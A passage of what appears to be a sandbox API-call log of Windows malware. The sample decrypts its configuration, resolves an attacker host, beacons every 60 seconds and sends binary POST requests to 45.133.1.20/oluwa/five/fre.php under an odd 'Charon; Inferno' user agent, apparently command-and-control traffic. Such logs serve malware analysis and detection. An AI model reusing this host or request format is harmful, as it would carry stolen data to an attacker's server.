len=159, flags=0) returned 159 [0249.729] GetProcessHeap () returned 0x6a0000 [0249.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0249.729] recv (in: s=0x82c, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0249.811] GetProcessHeap () returned 0x6a0000 [0249.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0249.812] GetProcessHeap () returned 0x6a0000 [0249.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0249.812] GetProcessHeap () returned 0x6a0000 [0249.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5578 | out: hHeap=0x6a0000) returned 1 [0249.813] GetProcessHeap () returned 0x6a0000 [0249.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0249.813] closesocket (s=0x82c) returned 0 [0249.814] GetProcessHeap () returned 0x6a0000 [0249.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaa0 | out: hHeap=0x6a0000) returned 1 [0249.814] GetProcessHeap () returned 0x6a0000 [0249.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0249.814] GetProcessHeap () returned 0x6a0000 [0249.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0249.815] GetProcessHeap () returned 0x6a0000 [0249.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0249.816] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x155c) returned 0x82c [0249.822] Sleep (dwMilliseconds=0xea60) [0249.824] GetProcessHeap () returned 0x6a0000 [0249.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0249.824] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.825] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0249.833] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.833] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0249.841] GetProcessHeap () returned 0x6a0000 [0249.841] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0249.842] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.843] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0249.844] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.844] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0249.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.845] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0249.845] GetProcessHeap () returned 0x6a0000 [0249.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0249.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.847] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0249.848] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.848] CryptDestroyKey (hKey=0x6ad520) returned 1 [0249.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.850] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0249.850] GetProcessHeap () returned 0x6a0000 [0249.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0249.855] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0249.856] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0249.858] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0249.859] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0249.864] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0249.865] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0249.866] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0249.866] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0249.866] GetProcessHeap () returned 0x6a0000 [0249.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0249.866] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0249.866] GetProcessHeap () returned 0x6a0000 [0249.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0249.867] GetProcessHeap () returned 0x6a0000 [0249.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0249.867] GetProcessHeap () returned 0x6a0000 [0249.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0249.868] GetProcessHeap () returned 0x6a0000 [0249.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0249.868] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.869] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0249.876] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.876] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0249.889] GetProcessHeap () returned 0x6a0000 [0249.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0249.890] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.891] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0249.892] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.892] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0249.893] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.894] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0249.894] GetProcessHeap () returned 0x6a0000 [0249.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0249.898] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.898] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0249.899] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.900] CryptDestroyKey (hKey=0x6ad020) returned 1 [0249.900] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.901] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0249.901] GetProcessHeap () returned 0x6a0000 [0249.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0249.902] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0249.902] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0249.903] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0249.904] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0249.904] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0249.905] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0249.909] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0249.909] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0249.909] GetProcessHeap () returned 0x6a0000 [0249.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0249.909] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0249.910] GetProcessHeap () returned 0x6a0000 [0249.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab00 [0249.910] socket (af=2, type=1, protocol=6) returned 0x830 [0249.910] connect (s=0x830, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0249.937] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0249.937] GetProcessHeap () returned 0x6a0000 [0249.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0249.937] GetProcessHeap () returned 0x6a0000 [0249.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0249.938] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0249.940] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0249.940] GetProcessHeap () returned 0x6a0000 [0249.940] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c53f8 [0249.940] GetProcessHeap () returned 0x6a0000 [0249.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0249.941] GetProcessHeap () returned 0x6a0000 [0249.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0249.941] GetProcessHeap () returned 0x6a0000 [0249.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0249.942] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0249.942] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0249.942] GetProcessHeap () returned 0x6a0000 [0249.942] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0249.943] GetProcessHeap () returned 0x6a0000 [0249.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0249.943] send (s=0x830, buf=0x6bd460*, len=242, flags=0) returned 242 [0249.944] send (s=0x830, buf=0x6bb998*, len=159, flags=0) returned 159 [0249.944] GetProcessHeap () returned 0x6a0000 [0249.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0249.944] recv (in: s=0x830, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0250.021] GetProcessHeap () returned 0x6a0000 [0250.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0250.022] GetProcessHeap () returned 0x6a0000 [0250.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0250.022] GetProcessHeap () returned 0x6a0000 [0250.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c53f8 | out: hHeap=0x6a0000) returned 1 [0250.023] GetProcessHeap () returned 0x6a0000 [0250.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0250.024] closesocket (s=0x830) returned 0 [0250.025] GetProcessHeap () returned 0x6a0000 [0250.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab00 | out: hHeap=0x6a0000) returned 1 [0250.025] GetProcessHeap () returned 0x6a0000 [0250.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0250.025] GetProcessHeap () returned 0x6a0000 [0250.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0250.026] GetProcessHeap () returned 0x6a0000 [0250.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0250.027] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1560) returned 0x830 [0250.029] Sleep (dwMilliseconds=0xea60) [0250.030] GetProcessHeap () returned 0x6a0000 [0250.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0250.031] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.031] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0250.036] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.037] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0250.045] GetProcessHeap () returned 0x6a0000 [0250.046] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0250.046] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.047] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0250.047] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.048] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0250.049] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.049] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0250.049] GetProcessHeap () returned 0x6a0000 [0250.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0250.050] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.050] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0250.051] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.052] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0250.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.053] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0250.053] GetProcessHeap () returned 0x6a0000 [0250.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0250.054] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0250.054] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0250.055] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0250.055] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0250.056] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0250.056] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0250.057] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0250.057] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0250.057] GetProcessHeap () returned 0x6a0000 [0250.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0250.057] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0250.057] GetProcessHeap () returned 0x6a0000 [0250.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0250.058] GetProcessHeap () returned 0x6a0000 [0250.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0250.059] GetProcessHeap () returned 0x6a0000 [0250.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0250.069] GetProcessHeap () returned 0x6a0000 [0250.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0250.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.070] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0250.080] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.080] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0250.087] GetProcessHeap () returned 0x6a0000 [0250.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0250.088] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.088] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0250.089] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.089] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0250.090] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.090] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0250.090] GetProcessHeap () returned 0x6a0000 [0250.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0250.091] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.092] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0250.093] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.093] CryptDestroyKey (hKey=0x6ad020) returned 1 [0250.095] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.096] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0250.096] GetProcessHeap () returned 0x6a0000 [0250.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0250.097] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0250.097] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0250.098] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0250.098] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0250.099] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0250.100] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0250.100] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0250.101] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0250.101] GetProcessHeap () returned 0x6a0000 [0250.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0250.101] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0250.101] GetProcessHeap () returned 0x6a0000 [0250.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba990 [0250.101] socket (af=2, type=1, protocol=6) returned 0x834 [0250.101] connect (s=0x834, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0250.127] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0250.127] GetProcessHeap () returned 0x6a0000 [0250.127] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0250.127] GetProcessHeap () returned 0x6a0000 [0250.127] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0250.128] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0250.129] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0250.129] GetProcessHeap () returned 0x6a0000 [0250.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c5338 [0250.129] GetProcessHeap () returned 0x6a0000 [0250.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0250.130] GetProcessHeap () returned 0x6a0000 [0250.130] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0250.130] GetProcessHeap () returned 0x6a0000 [0250.130] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0250.131] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0250.132] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0250.132] GetProcessHeap () returned 0x6a0000 [0250.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0250.132] GetProcessHeap () returned 0x6a0000 [0250.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0250.133] send (s=0x834, buf=0x6bd460*, len=242, flags=0) returned 242 [0250.133] send (s=0x834, buf=0x6bb998*, len=159, flags=0) returned 159 [0250.133] GetProcessHeap () returned 0x6a0000 [0250.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0250.133] recv (in: s=0x834, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0250.245] GetProcessHeap () returned 0x6a0000 [0250.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0250.245] GetProcessHeap () returned 0x6a0000 [0250.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0250.246] GetProcessHeap () returned 0x6a0000 [0250.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5338 | out: hHeap=0x6a0000) returned 1 [0250.246] GetProcessHeap () returned 0x6a0000 [0250.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0250.246] closesocket (s=0x834) returned 0 